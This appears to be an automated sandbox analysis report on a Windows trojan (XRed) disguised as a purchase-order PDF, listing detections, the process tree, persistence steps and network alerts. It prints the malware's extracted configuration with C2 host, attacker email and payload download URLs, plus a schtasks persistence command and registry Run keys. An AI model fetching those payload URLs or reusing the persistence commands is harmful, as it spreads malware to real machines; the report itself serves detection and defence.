Windows Analysis Report
New PO - Supplier 16-12-2024-Pdf.exe

Overview

General Information

Sample name: New PO - Supplier 16-12-2024-Pdf.exe
Analysis ID: 1582347
MD5: 38d3095d1b748cd53c65395718d7c5f4
SHA1: 3c0221471b641a641a9141a731f6ee09663e6538
SHA256: f3724bf49bfd8d11ef1f81b4c6aebc4d3281cecfa357d4fb3ae388a4add242e6
Tags: exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected ProcessChecker

Classification

  • System is w10x64
  • New PO - Supplier 16-12-2024-Pdf.exe (PID: 1472 cmdline: "C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe" MD5: 38D3095D1B748CD53C65395718D7C5F4)
    • ._cache_New PO - Supplier 16-12-2024-Pdf.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
      • cmd.exe (PID: 3604 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 6508 cmdline: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 2188 cmdline: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 4508 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
      • WerFault.exe (PID: 8148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 8704 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 3180 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • TXAASJ.exe (PID: 2300 cmdline: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe MD5: DF6FA61AC1509C2D8B720690829D5634)
  • Synaptics.exe (PID: 1472 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • TXAASJ.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
  • TXAASJ.exe (PID: 7924 cmdline: "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
  • TXAASJ.exe (PID: 5760 cmdline: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe MD5: DF6FA61AC1509C2D8B720690829D5634)
  • TXAASJ.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
  • TXAASJ.exe (PID: 7176 cmdline: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe MD5: DF6FA61AC1509C2D8B720690829D5634)
  • cleanup
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings
New PO - Supplier 16-12-2024-Pdf.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |
New PO - Supplier 16-12-2024-Pdf.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\BBLXFG.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
C:\Users\user\Documents\IPKGELNTQY\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Users\user\Documents\IPKGELNTQY\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\RCX6FCE.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\ProgramData\Synaptics\RCX6FCE.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000007.00000002.3396869708.00000000007F8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000007.00000002.3397773164.0000000002C10000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |

Source | Rule | Description | Author | Strings
0.0.New PO - Supplier 16-12-2024-Pdf.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
0.0.New PO - Supplier 16-12-2024-Pdf.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

System Summary

Source: Network Connection, Author: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, Initiated: true, ProcessId: 7080, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49769
Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ParentProcessId: 7080, ParentProcessName: ._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ProcessId: 2188, ProcessName: wscript.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ParentProcessId: 7080, ParentProcessName: ._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ProcessId: 2188, ProcessName: wscript.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ParentProcessId: 7080, ParentProcessName: ._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ProcessId: 2188, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessId: 7080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BBLXFG
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessId: 7080, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BBLXFG.lnk
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, CommandLine: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3604, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, ProcessId: 6508, ProcessName: schtasks.exe
Source: Process started, Author: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ParentProcessId: 7080, ParentProcessName: ._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ProcessId: 2188, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe, ProcessId: 1472, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 4508, TargetFilename: C:\Users\user\AppData\Local\Temp\NEnoihuS.xlsm
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:40:48.309364+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49876 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:41:24.558784+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50146 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:42:00.812107+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50154 | 172.111.138.100 | 5552 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:40:37.786370+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49751 | 69.42.215.252 | 80 | TCP


                              AV Detection

Source: New PO - Supplier 16-12-2024-Pdf.exe, Avira: detected
Source: http://xred.site50.net/syn/SUpdate.ini0, Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dl, Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: C:\ProgramData\Synaptics\RCX6FCE.tmp, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX6FCE.tmp, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe, Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: C:\ProgramData\Synaptics\Synaptics.exe, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe, Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: New PO - Supplier 16-12-2024-Pdf.exe, Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCX6FCE.tmp, ReversingLabs: Detection: 91%
Source: C:\ProgramData\Synaptics\Synaptics.exe, ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe, ReversingLabs: Detection: 86%
Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ReversingLabs: Detection: 86%
Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, ReversingLabs: Detection: 91%
Source: New PO - Supplier 16-12-2024-Pdf.exe, Virustotal: Detection: 80%
Source: New PO - Supplier 16-12-2024-Pdf.exe, ReversingLabs: Detection: 92%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 91.6% probability
Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCX6FCE.tmp, Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, Joe Sandbox ML: detected
Source: New PO - Supplier 16-12-2024-Pdf.exe, Joe Sandbox ML: detected
Source: New PO - Supplier 16-12-2024-Pdf.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:50062 version: TLS 1.2
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00EA2044
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00EA219F
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00EA24A9
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E96B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00E96B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E96E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_00E96E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00E9F350
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_00E9FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E6DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_00E6DD92
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9FD47 FindFirstFileW,FindClose,9_2_00E9FD47
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe File opened: C:\Users\user
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe File opened: C:\Users\user\AppData\Roaming
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                              Source: excel.exeMemory has grown: Private usage: 2MB later: 69MB

                              Networking

                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.6:49751 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.6:49876 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49876 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49769 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49971 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50073 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50139 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.6:50146 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50146 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50147 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.6:50154 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50154 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50150 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50153 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49742 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49787 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49759 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49741 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49760 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49774 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49811 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49777 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49812 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49823 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49799 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49855 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49870 -> 142.250.185.78:443
